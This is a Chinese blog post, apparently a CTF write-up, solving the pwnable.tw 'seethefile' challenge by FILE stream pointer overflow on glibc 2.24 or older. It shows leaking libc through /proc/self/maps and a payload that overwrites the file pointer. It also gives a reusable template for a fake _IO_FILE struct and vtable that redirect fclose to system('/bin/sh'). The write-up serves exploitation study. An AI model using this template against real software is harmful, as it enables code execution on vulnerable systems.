File Stream Pointer Overflow [libc<=2.24]

pwnable.tw做到250pt就连偷看wp也领悟不能,exp是不可能会写的,shellcode编码也是编不出来的,比较有眼缘的一道seethefile,在看了大佬哄完女票睡觉后的文章之后迫不及待尝试了一个demo也失败了。

身边的大佬说libc新版会有检查,我以为只是为了安慰我,时隔半年再翻出来终于在google字缝里看到了libc<=2.24这个说法。不信邪拿2.26硬试,一点一点仿照正常流程修改伪造的结构体,最后卡在vtable检查函数之前一筹莫展。

先把demo放在一边,拿出seethefile试了下vmmap发现libc用的是2.23,善。


0x00 首先搬运一下关于File结构体的姿势:

参考自:

暂时没找到bin的东华杯pwn450 wp 溢出利用FILE结构体  --安全客

以及情人节这天膜起来分外寒冷的 Head First FILE Stream Pointer Overflow --WooYun知识库

1.struct  _IO_FILE

2.平常使用file结构体的情景:

FILE* fp=fopen( "file name" , "r" ) ;


事实上,系统并不是直接分配的FILE(_IO_FILE)结构体,而是名字为_IO_FILE_plus结构体,这个结构体包含了_IO_FILE结构体,还包含了一个虚函数表指针:

vtable指向的内容:

整体上大致如下:

利用的思路就是想办法溢出覆盖掉fp,使其指向一块可控的内存区域,并在该位置伪造_IO_FILE_plus结构体,以及vtable指向的函数表,最后在函数表相应位置填入system地址来拿shell。

0x01 pwnable.tw之seethefile

实际上是拿这道题作为入门fsp(File Stream Pointer Overflow)的一个demo。

1.首先程序流程分析,功能菜单有打开文件,读文件,写文件,关闭文件,退出时一个scanf加%s是溢出点可以覆盖掉fp指针,需要32bytes的paddings。

2.因为这里fp指针保存在bss段而非栈或堆上,所以不需要泄露栈地址或堆地址了,给了libc.so的话只需要泄露libc基址。因为有读文件的功能很敏感的想到linux系统本身的文件机制,而且读文件的时候只对诸如“flag”、“Flag”、“{”做了检查,显然可以读取/proc/self/maps来泄露程序内存映像:



还是熟悉的味道,还是熟悉的maps,没毛病!因为读文件每次只读了399字节,所以要多读几次,得到libc基址,结合题目给的libc.so得到system实际地址。

3.接着开始主要工作,fsp的利用。首先根据标准的 _IO_FILE结构体(例如stderr)做一个fake_struct的雏形:

其中所有地址因为地址随机化的缘故可能都不能用了,先用'AAAA'或者'BBBB'替换掉,其他位置照抄就可以。另外一些文章里面关于_IO_FILE结构体大小是160字节的说法应该有一点问题,_IO_FILE的大小应该是0x94(148)字节。

暂时为'AAAA'的部分直接替换成一个可读可写的地址就可以(这里用name的地址),至于'BBBB'应指向vtable,因为这里准备直接把函数表vtable放在fake_struct后面,所以'BBBB'替换为fake_struct的起始地址+0x98

紧跟在fake_struct后面放置伪造的函数表,结合原本的vtable:

把开始的两个四字节置全0,剩下的全部置为system的地址:

payload='\x00'*32+p32(0x804b284)+fake_struct+p32(0)*2+p32(system_addr)*15 + p32(system_addr))

经过调试可以发现,fclose()实际的实现过程是先调用_IO_file_close_it(其中_IO_FILE结构起始地址作为第一个参数)

单步步入,最后发现实际上对函数表的查找和调用位于_IO_file_close_it+271

此时eax的值为vtable函数表的起始地址,执行offset :0x44即vtable[17]处的函数,我们往fake vtable中填入了2个零指针和16个system指针,显然够用了。这时栈顶存放的正是_IO_file_close_it的第一个参数,前面已经把_IO_FILE的开始位置填入"/bin/sh\x00",从而相当于执行了system("/bin/sh")成功拿到shell!



最后放上fake _IO_FILE struct和fake vtable的样板:

fake_struct=[ '/bin/sh\x00' ,'\x00\x00\x00\x00','\x00\x00\x00\x00',                                                                    '\x00\x00\x00\x00','\x00\x00\x00\x00','\x00\x00\x00\x00','\x00\x00\x00\x00',      '\x00\x00\x00\x00','\x00\x00\x00\x00','\x00\x00\x00\x00','\x00\x00\x00\x00', '\x00\x00\x00\x00','AAAA' ,'\x03\x00\x00\x00','\x00\x00\x00\x00', '\x00\x00\x00\x00','\x00\x00\x00\x00','AAAA' ,'\xff\xff\xff\xff', '\xff\xff\xff\xff','\x00\x00\x00\x00','AAAA' ,'\x00\x00\x00\x00', '\x00\x00\x00\x00','\x00\x00\x00\x00','\x00\x00\x00\x00','\x00\x00\x00\x00', '\x00\x00\x00\x00','\x00\x00\x00\x00','\x00\x00\x00\x00','\x00\x00\x00\x00', '\x00\x00\x00\x00','\x00\x00\x00\x00','\x00\x00\x00\x00','\x00\x00\x00\x00', '\x00\x00\x00\x00','BBBB' ]

fake_struct=''.join(fake_struct)

fake_struct=fake_struct.replace('AAAA',p32(addr1))         #可读写的有效地址

fake_struct=fake_struct.replace('BBBB',p32(addr2))          # _IO_FILE struct 起始地址+0x98

vtable=p32(0)*2

vtable+=p32(system_addr)*16

仅适用于libc<=2.24

感兴趣的同学也可以钻研一波libc2.26的fsp利用。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 215,723评论 6 498
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,003评论 3 391
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 161,512评论 0 351
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,825评论 1 290
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,874评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,841评论 1 295
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,812评论 3 416
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,582评论 0 271
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,033评论 1 308
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,309评论 2 331
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,450评论 1 345
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,158评论 5 341
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,789评论 3 325
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,409评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,609评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,440评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,357评论 2 352

推荐阅读更多精彩内容